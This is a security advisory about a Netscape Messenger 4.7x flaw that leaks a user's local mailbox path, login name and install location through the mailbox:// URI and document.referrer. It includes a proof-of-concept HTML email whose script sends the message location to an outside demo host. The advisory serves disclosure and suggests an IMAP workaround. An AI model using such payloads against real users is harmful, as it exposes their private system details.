COMMAND

    Netscape Messanger

SYSTEMS AFFECTED

    Netscape 4.7x All Platforms

PROBLEM

    '3APA3A' found following.  There are known bugs in Netscape  which
    require information  on user's  files location.   This bug  is not
    serious one, but it allows to get this location.

    Netscape Messanger uses internal protocol called mailbox://.   The
    format of mailbox URI is

        mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber

    this  URI  contains  full  path  to  user's  mailbox which usually
    contains user's login name and in case of Windows 9x - the path to
    Netscape installation.  It's impossible to determine this location
    from  javascript  inside  e-mail  message,  because Netscape hides
    document.location from javascript.

    It's possible to  retrieve mailbox:// URI  of the message.   E.g.,
    it's possible  to retrieve  mailbox location,  user's system login
    and in some cases path to Netscape installation.

    When link invoked from message, Netscape sets  "document.referrer"
    property to URI  of the message  contained this link.   Javascript
    on the target page is able  to retrieve this property and pass  it
    to any location together with IP of calling machine.

    If you read  this message with  Netscape Messanger you  can simply
    click reference

        http://www.security.nnov.ru/files/nsdemo.asp

    to see  your mailbox  location or  you can  force Netscape user to
    open this page with message like this:

        From: 3APA3A
        To: 3APA3A
        Subject: Test your Netscape
        Content-Type: text/html
        
        <html><script> window.open('http://www.security.nnov.ru/files/nsdemo.asp?'+escape(document.location));
        </script>
        <A HREF="http://www.security.nnov.ru/files/nsdemo.asp"> http://www.security.nnov.ru/files/nsdemo.asp</A>
        </html>

    This vulnerability  only affects  the users  local (on  the client
    machine) mailbox.  If a user keeps his mail on an IMAP server, the
    the referer will show up as an IMAP:// url.

SOLUTION

    Netscape was contacted May, 30 2001.  No feedback were given.

    Workaround: Don't use POP3, and keep your mail on an IMAP server.